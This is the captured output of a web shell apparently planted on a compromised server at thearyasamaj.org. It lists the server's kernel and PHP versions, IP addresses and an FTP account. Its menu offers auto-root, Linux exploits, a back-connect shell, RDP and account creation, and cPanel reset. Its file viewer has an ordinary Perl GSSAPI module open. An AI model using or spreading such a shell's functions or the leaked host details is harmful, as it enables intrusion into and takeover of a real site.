Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.158
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib64 /
perl5 /
vendor_perl /
GSSAPI /
OID /
[ HOME SHELL ]
Name
Size
Permission
Action
Set.pm
981
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Set.pm
package GSSAPI::OID::Set; require 5.005_62; use strict; use warnings; require Exporter; our @ISA = qw(Exporter GSSAPI); our %EXPORT_TAGS = ( 'all' => [ qw() ] ); our @EXPORT_OK = ( @{ $EXPORT_TAGS{'all'} } ); our @EXPORT = ( @{ $EXPORT_TAGS{'all'} } ); 1; __END__ =head1 NAME GSSAPI::OID::Set - methods for handling sets of GSSAPI OIDs, and some constant OID sets. =head1 SYNOPSIS use GSSAPI; $oidset = GSSAPI::OID::Set->new; $status = $oidset->insert($oid); $status = $oidset->contains($oid, $isthere); if ($status && $isthere) { # blah blah blah } =head1 DESCRIPTION C<GSSAPI::OID::Set> objects are simple sets of GSSAPI:OIDs (duh). =head1 BUGS There's no way to list the OIDs in a set; you can only check to see if a particular one is present. This is really a bug in the C API, so any fix would be implementation specific. =head1 AUTHOR Philip Guenther <pguen@cpan.org> =head1 SEE ALSO perl(1) GSSAPI(3p) GSSAPI::OID(3p) RFC2743 =cut
Close